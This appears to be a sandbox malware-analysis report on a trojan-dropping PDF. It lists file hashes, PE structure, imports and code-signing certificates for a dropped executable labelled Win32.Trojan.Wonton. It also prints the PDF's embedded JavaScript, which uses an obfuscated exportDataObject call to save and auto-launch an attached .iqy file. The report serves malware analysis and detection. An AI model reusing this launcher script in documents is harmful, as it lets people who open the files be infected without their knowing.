VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Trojan, Dropper, Downloader

2c5729e17b64cd4e905ccfeabbc913ed945e17625c35ec1d6932194aae83d7c6 (SHA256)

DOC_443353149786_10082018.pdf

PDF Document

Created at 2018-08-10 12:36:00

Notifications (2/2)

The overall sleep time of all monitored processes was truncated from "20 minutes, 15 seconds" to "2 minutes" to reveal dormant functionality.

The operating system was rebooted during the analysis.

Filename Category Type Severity
C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe Created File Binary Blacklisted
Mime Type application/x-dosexec
File Size 101.61 KB
MD5 5473299167525c8d0addb8248900606a
SHA1 fa99241ee9581f281544423881cf702375d33c23
SHA256 bc1fc69f9747dc034ece7d9bb795c5e596d9be6ca71efe75c6c0fd18f3cbfbf5
SSDeep 3072:Zb7luhxIgK+DNYIiRs1T8M7Eu6KX1wke3G:Zb7luYgKKNxiRsOM7E0QW
ImpHash e8f2df81b7f95f75c926f6d64aa71cb5
File Reputation Information
Severity
Blacklisted
First Seen 2018-08-10 10:35 (UTC+2)
Last Seen 2018-08-10 13:00 (UTC+2)
Names Win32.Trojan.Wonton
Families Wonton
Classification Trojan
PE Information
Image Base 0x400000
Entry Point 0x407209
Size Of Code 0x11600
Size Of Initialized Data 0x6600
File Type executable
Subsystem windows_gui
Machine Type i386
Compile Timestamp 2018-08-09 13:23:42+00:00
Sections (5)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x11581 0x11600 0x400 cnt_code, mem_execute, mem_read 6.66
.rdata 0x413000 0x31d4 0x3200 0x11a00 cnt_initialized_data, mem_read 5.2
.data 0x417000 0x54e0 0x1600 0x14c00 cnt_initialized_data, mem_read, mem_write 4.71
.rsrc 0x41d000 0x1b4 0x200 0x16200 cnt_initialized_data, mem_read 5.11
.reloc 0x41e000 0x1a12 0x1c00 0x16400 cnt_initialized_data, mem_discardable, mem_read 4.56
Imports (3)
KERNEL32.dll (71)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GlobalAlloc 0x0 0x413008 0x15b6c 0x1456c 0x2b3
GlobalFree 0x0 0x41300c 0x15b70 0x14570 0x2ba
GetTickCount 0x0 0x413010 0x15b74 0x14574 0x293
GetSystemTime 0x0 0x413014 0x15b78 0x14578 0x277
CreateDirectoryW 0x0 0x413018 0x15b7c 0x1457c 0x81
Sleep 0x0 0x41301c 0x15b80 0x14580 0x4b2
LoadLibraryW 0x0 0x413020 0x15b84 0x14584 0x33f
GetLastError 0x0 0x413024 0x15b88 0x14588 0x202
lstrcatW 0x0 0x413028 0x15b8c 0x1458c 0x53f
lstrcpyW 0x0 0x41302c 0x15b90 0x14590 0x548
CloseHandle 0x0 0x413030 0x15b94 0x14594 0x52
CreateFileW 0x0 0x413034 0x15b98 0x14598 0x8f
WriteConsoleW 0x0 0x413038 0x15b9c 0x1459c 0x524
lstrlenW 0x0 0x41303c 0x15ba0 0x145a0 0x54e
MultiByteToWideChar 0x0 0x413040 0x15ba4 0x145a4 0x367
GetProcAddress 0x0 0x413044 0x15ba8 0x145a8 0x245
GetModuleHandleW 0x0 0x413048 0x15bac 0x145ac 0x218
ExitProcess 0x0 0x41304c 0x15bb0 0x145b0 0x119
DecodePointer 0x0 0x413050 0x15bb4 0x145b4 0xca
HeapFree 0x0 0x413054 0x15bb8 0x145b8 0x2cf
EncodePointer 0x0 0x413058 0x15bbc 0x145bc 0xea
GetSystemTimeAsFileTime 0x0 0x41305c 0x15bc0 0x145c0 0x279
GetCommandLineA 0x0 0x413060 0x15bc4 0x145c4 0x186
HeapSetInformation 0x0 0x413064 0x15bc8 0x145c8 0x2d3
GetStartupInfoW 0x0 0x413068 0x15bcc 0x145cc 0x263
TerminateProcess 0x0 0x41306c 0x15bd0 0x145d0 0x4c0
GetCurrentProcess 0x0 0x413070 0x15bd4 0x145d4 0x1c0
UnhandledExceptionFilter 0x0 0x413074 0x15bd8 0x145d8 0x4d3
SetUnhandledExceptionFilter 0x0 0x413078 0x15bdc 0x145dc 0x4a5
IsDebuggerPresent 0x0 0x41307c 0x15be0 0x145e0 0x300
GetCPInfo 0x0 0x413080 0x15be4 0x145e4 0x172
InterlockedIncrement 0x0 0x413084 0x15be8 0x145e8 0x2ef
InterlockedDecrement 0x0 0x413088 0x15bec 0x145ec 0x2eb
GetACP 0x0 0x41308c 0x15bf0 0x145f0 0x168
GetOEMCP 0x0 0x413090 0x15bf4 0x145f4 0x237
IsValidCodePage 0x0 0x413094 0x15bf8 0x145f8 0x30a
TlsAlloc 0x0 0x413098 0x15bfc 0x145fc 0x4c5
TlsGetValue 0x0 0x41309c 0x15c00 0x14600 0x4c7
TlsSetValue 0x0 0x4130a0 0x15c04 0x14604 0x4c8
TlsFree 0x0 0x4130a4 0x15c08 0x14608 0x4c6
SetLastError 0x0 0x4130a8 0x15c0c 0x1460c 0x473
GetCurrentThreadId 0x0 0x4130ac 0x15c10 0x14610 0x1c5
InitializeCriticalSectionAndSpinCount 0x0 0x4130b0 0x15c14 0x14614 0x2e3
DeleteCriticalSection 0x0 0x4130b4 0x15c18 0x14618 0xd1
LeaveCriticalSection 0x0 0x4130b8 0x15c1c 0x1461c 0x339
EnterCriticalSection 0x0 0x4130bc 0x15c20 0x14620 0xee
WriteFile 0x0 0x4130c0 0x15c24 0x14624 0x525
GetStdHandle 0x0 0x4130c4 0x15c28 0x14628 0x264
GetModuleFileNameW 0x0 0x4130c8 0x15c2c 0x1462c 0x214
HeapCreate 0x0 0x4130cc 0x15c30 0x14630 0x2cd
HeapSize 0x0 0x4130d0 0x15c34 0x14634 0x2d4
HeapAlloc 0x0 0x4130d4 0x15c38 0x14638 0x2cb
RaiseException 0x0 0x4130d8 0x15c3c 0x1463c 0x3b1
GetModuleFileNameA 0x0 0x4130dc 0x15c40 0x14640 0x213
FreeEnvironmentStringsW 0x0 0x4130e0 0x15c44 0x14644 0x161
WideCharToMultiByte 0x0 0x4130e4 0x15c48 0x14648 0x511
GetEnvironmentStringsW 0x0 0x4130e8 0x15c4c 0x1464c 0x1da
SetHandleCount 0x0 0x4130ec 0x15c50 0x14650 0x46f
GetFileType 0x0 0x4130f0 0x15c54 0x14654 0x1f3
QueryPerformanceCounter 0x0 0x4130f4 0x15c58 0x14658 0x3a7
GetCurrentProcessId 0x0 0x4130f8 0x15c5c 0x1465c 0x1c1
LCMapStringW 0x0 0x4130fc 0x15c60 0x14660 0x32d
GetStringTypeW 0x0 0x413100 0x15c64 0x14664 0x269
RtlUnwind 0x0 0x413104 0x15c68 0x14668 0x418
SetFilePointer 0x0 0x413108 0x15c6c 0x1466c 0x466
GetConsoleCP 0x0 0x41310c 0x15c70 0x14670 0x19a
GetConsoleMode 0x0 0x413110 0x15c74 0x14674 0x1ac
HeapReAlloc 0x0 0x413114 0x15c78 0x14678 0x2d2
IsProcessorFeaturePresent 0x0 0x413118 0x15c7c 0x1467c 0x304
SetStdHandle 0x0 0x41311c 0x15c80 0x14680 0x487
FlushFileBuffers 0x0 0x413120 0x15c84 0x14684 0x157
USER32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
wsprintfW 0x0 0x413128 0x15c8c 0x1468c 0x333
ADVAPI32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegEnumKeyW 0x0 0x413000 0x15b64 0x14564 0x250
Digital Signatures (2)
Certificate: CINECTIC LIMITED
Issued by CINECTIC LIMITED
Parent Certificate thawte SHA256 Code Signing CA
Country Name GB
Valid From 2017-10-31 00:00:00+00:00
Valid Until 2018-10-31 23:59:59+00:00
Algorithm sha256_rsa
Serial Number B3 08 2B 6F C3 F7 DE 00 A2 E2 68 B0 71 5F 76 3
Thumbprint BB 58 21 0B 6A B0 99 55 19 3C EA 32 89 40 A6 05 9F 49 B9 48
Certificate: thawte SHA256 Code Signing CA
Issued by thawte SHA256 Code Signing CA
Country Name US
Valid From 2013-12-10 00:00:00+00:00
Valid Until 2023-12-09 23:59:59+00:00
Algorithm sha256_rsa
Serial Number 71 A0 B7 36 95 DD B1 AF C2 3B 2B 9A 18 EE 54 CB
Thumbprint D0 0C FD BF 46 C9 8A 83 8B C1 0D C4 E0 97 AE 01 52 C4 61 BC
C:\Users\BMe1N39jU1 6criBQ\Desktop\DOC_443353149786_10082018.pdf Sample File PDF Unknown
Mime Type application/pdf
File Size 1.79 KB
MD5 13cc8c748ab6beab2b942a9d04679511
SHA1 7bc60af7993f8bf3d595e98e87f8dd99d8e7182e
SHA256 2c5729e17b64cd4e905ccfeabbc913ed945e17625c35ec1d6932194aae83d7c6
SSDeep 48:cfU1OG4oBCugVCn7V3P2oLaL7gjwmVLe9k+1SCZQy4Kv86u6I8:cfMEoBhgg7t2oOL7gsmVLeO+ECZQy4Kd
PDF Information
Title -
Subject -
Author -
Creator -
Keywords -
Producer iTextSharp™ 5.5.10 ©2000-2016 iText Group NV (AGPL-version)
Page Count 1
Encrypted False
Create Time 2018-08-10 11:50:18+00:00
Modify Time 2018-08-10 11:50:18+00:00
Embedded JavaScript (2)
function rfunc900() {
    var hadapet = {};
    hadapet['nLaunch'] = 2;              // exportDataObject mode 2: save the attachment, then launch it
    hadapet['cName'] = '10082016.iqy';   // name of the embedded file object to export
    hadapet['r2'] = 'exportDataObject';  // API name stored as a string and invoked via this[...]
    this[hadapet['r2']](hadapet);
}
rfunc900();
bea0276c51bd6dbccb64110a8655fd623cbb9ebf6e0105c57f62e53e209361b6 Embedded File Text Unknown
Parent File C:\Users\BMe1N39jU1 6criBQ\Desktop\DOC_443353149786_10082018.pdf
Mime Type text/plain
File Size 0.04 KB
MD5 47205fbbb191dbcab606007fd7612ba7
SHA1 b5806f9c13a41ff3991789a0320519156875efe2
SHA256 bea0276c51bd6dbccb64110a8655fd623cbb9ebf6e0105c57f62e53e209361b6
SSDeep 3:LyUyDzKXfGTKyREUOAXFovRyQ:LSDmPRyRYv1